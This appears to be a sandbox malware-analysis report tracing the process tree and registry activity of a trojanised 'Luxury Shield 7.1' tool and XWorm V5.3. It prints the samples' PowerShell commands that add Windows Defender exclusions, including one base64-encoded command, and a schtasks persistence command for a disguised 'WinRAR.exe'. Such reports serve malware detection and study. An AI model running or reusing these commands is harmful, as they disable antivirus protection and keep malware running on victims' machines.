Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0 | XWorm.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | Luxury Shield 7.1.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 | XWorm.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | msedge.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
6080 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
3928 | msedge.exe
3928 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
3268 | identity_helper.exe
3268 | identity_helper.exe
1276 | msedge.exe
1276 | msedge.exe
5428 | powershell.exe
5428 | powershell.exe
5428 | powershell.exe
5652 | powershell.exe
5652 | powershell.exe
5652 | powershell.exe
5260 | powershell.exe
5260 | powershell.exe
5260 | powershell.exe
5340 | powershell.exe
5340 | powershell.exe
5340 | powershell.exe
5900 | powershell.exe
5900 | powershell.exe
5900 | powershell.exe
372 | powershell.exe
372 | powershell.exe
372 | powershell.exe
5740 | msedge.exe
5740 | msedge.exe
5740 | msedge.exe
5740 | msedge.exe
5388 | powershell.exe
5388 | powershell.exe
5388 | powershell.exe
5768 | powershell.exe
5768 | powershell.exe
5768 | powershell.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid | Process
2312 | Luxury Shield 7.1.exe
444 | XWorm.exe
4536 | Luxury Shield 7.1.exe
5748 | msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid | Process
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
1468 | msedge.exe
Suspicious use of AdjustPrivilegeToken 53 IoCs
description | pid | Process
Token: SeDebugPrivilege | 5428 | powershell.exe
Token: SeDebugPrivilege | 5652 | powershell.exe
Token: SeDebugPrivilege | 5928 | WinRAR.exe
Token: SeDebugPrivilege | 5260 | powershell.exe
Token: SeDebugPrivilege | 5340 | powershell.exe
Token: SeDebugPrivilege | 5680 | WinRAR.exe
Token: SeDebugPrivilege | 5900 | powershell.exe
Token: SeDebugPrivilege | 372 | powershell.exe
Token: SeDebugPrivilege | 3788 | WinRAR.exe
Token: SeDebugPrivilege | 2192 | WinRAR.exe
Token: SeDebugPrivilege | 5388 | powershell.exe
Token: SeDebugPrivilege | 5768 | powershell.exe
Token: SeDebugPrivilege | 5696 | WinRAR.exe
Token: SeDebugPrivilege | 2312 | Luxury Shield 7.1.exe
Token: SeDebugPrivilege | 4976 | WinRAR.exe
Token: SeDebugPrivilege | 5852 | WinRAR.exe
Token: 33 | 228 | AUDIODG.EXE
Token: SeIncBasePriorityPrivilege | 228 | AUDIODG.EXE
Token: SeDebugPrivilege | 5688 | WinRAR.exe
Token: SeDebugPrivilege | 1704 | WinRAR.exe
Token: SeDebugPrivilege | 2472 | WinRAR.exe
Token: SeDebugPrivilege | 5388 | powershell.exe
Token: SeDebugPrivilege | 3896 | WinRAR.exe
Token: SeDebugPrivilege | 4656 | WinRAR.exe
Token: SeDebugPrivilege | 1820 | WinRAR.exe
Token: SeDebugPrivilege | 800 | WinRAR.exe
Token: SeDebugPrivilege | 1804 | powershell.exe
Token: SeDebugPrivilege | 68 | powershell.exe
Token: SeDebugPrivilege | 5272 | WinRAR.exe
Token: SeDebugPrivilege | 2376 | powershell.exe
Token: SeDebugPrivilege | 5536 | powershell.exe
Token: SeDebugPrivilege | 3468 | WinRAR.exe
Token: SeDebugPrivilege | 5032 | WinRAR.exe
Token: SeDebugPrivilege | 4536 | Luxury Shield 7.1.exe
Token: SeDebugPrivilege | 5856 | WinRAR.exe
Token: SeDebugPrivilege | 3500 | WinRAR.exe
Token: SeDebugPrivilege | 2332 | WinRAR.exe
Token: SeDebugPrivilege | 4856 | WinRAR.exe
Token: SeDebugPrivilege | 1920 | WinRAR.exe
Token: SeDebugPrivilege | 4740 | WinRAR.exe
Token: SeDebugPrivilege | 1792 | WinRAR.exe
Token: SeDebugPrivilege | 4648 | WinRAR.exe
Token: SeDebugPrivilege | 1448 | nexusv2.exe
Token: SeDebugPrivilege | 3396 | WinRAR.exe
Token: SeDebugPrivilege | 2324 | WinRAR.exe
Token: SeDebugPrivilege | 3204 | WinRAR.exe
Token: SeDebugPrivilege | 5132 | WinRAR.exe
Token: SeDebugPrivilege | 5908 | WinRAR.exe
Token: SeDebugPrivilege | 5572 | WinRAR.exe
Token: SeDebugPrivilege | 6040 | WinRAR.exe
Token: SeDebugPrivilege | 5572 | WinRAR.exe
Token: SeDebugPrivilege | 2656 | WinRAR.exe
Token: SeDebugPrivilege | 3468 | WinRAR.exe
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 2312 Luxury Shield 7.1.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 1468 msedge.exe 444 XWorm.exe -
Suspicious use of SendNotifyMessage 25 IoCs
Suspicious use of SetWindowsHookEx 44 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
PID 1468: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
    PID 2892: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd3ab646f8,0x7ffd3ab64708,0x7ffd3ab64718
    PID 4272: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
    PID 3928: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    PID 3060: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8
    PID 3032: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
    PID 4988: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
    PID 2300: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
    PID 3268: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    PID 3896: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
    PID 8: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
    PID 2804: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 /prefetch:8
    PID 4968: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
    PID 4008: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
    PID 3568: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5324 /prefetch:8
    PID 2136: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
    PID 1276: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    PID 5740: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
    PID 5420: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
    PID 432: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1856 /prefetch:1
    PID 5968: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8
    PID 5996: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
    PID 5336: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:8
    PID 5748: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4048 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
    PID 3228: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:8
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
    PID 988: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2068,9972357990926575431,6184424082520951355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
      - Modifies registry class
      - Suspicious use of SetWindowsHookEx
PID 4452: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 1696: C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 228: C:\Windows\system32\AUDIODG.EXE 0x2fc 0x51c
  - Suspicious use of AdjustPrivilegeToken
PID 4552: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID 5204: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Pass to use.txt
PID 5316: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"
    PID 5428: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 5628: "C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
    PID 5652: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 5928: "C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
        PID 6080: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WinRAR" /tr "C:\Users\Public\WinRAR.exe"
          - Scheduled Task/Job: Scheduled Task
PID 5132: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"
    PID 5260: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 4144: "C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
    PID 5340: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 5680: "C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
PID 5804: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"
    PID 5900: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 2312: "C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
        PID 1496: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\ILMerge.exe"
        PID 1500: C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 3828
          - Program crash
    PID 372: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 3788: "C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
PID 2192: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 5872: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"
    PID 5388: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 5608: "C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
    PID 5768: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 5696: "C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
PID 4976: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 5852: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 5688: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 1704: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 2472: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 1280: "C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm V5.3.exe"
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
    PID 5388: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAdQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZgBsACMAPgA="
      - Suspicious use of AdjustPrivilegeToken
    PID 2304: "C:\Windows\Progman.exe"
      - Executes dropped EXE
    PID 444: "C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe"
      - Executes dropped EXE
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Enumerates system info in registry
      - Modifies Internet Explorer settings
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
        PID 4776: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kkjqoena\kkjqoena.cmdline"
          - Suspicious use of SetWindowsHookEx
            PID 2696: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD71.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc381C51ECC54B42DAA0C641C297BFFDB.TMP"
PID 4032: C:\Windows\system32\wbem\WmiApSrv.exe
PID 3896: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 4656: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 1820: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 800: C:\Users\Public\WinRAR.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
PID 1464: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2312 -ip 2312
PID 2944: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\Luxury Sheild v7.1.exe"
    PID 1804: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of AdjustPrivilegeToken
    PID 4536: "C:\Users\Admin\AppData\Local\Temp\Luxury Shield 7.1.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Modifies registry class
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
        PID 5912: "C:\Users\Admin\Downloads\Luxury Shield 7.1\Luxury Shield 7.1\ILMerge.exe"
        PID 5572: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zld2ybby\zld2ybby.cmdline"
          - System Location Discovery: System Language Discovery
            PID 3124: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9071.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3DB3029D260A4DEEAF138254C3A6C9CB.TMP"
              - System Location Discovery: System Language Discovery
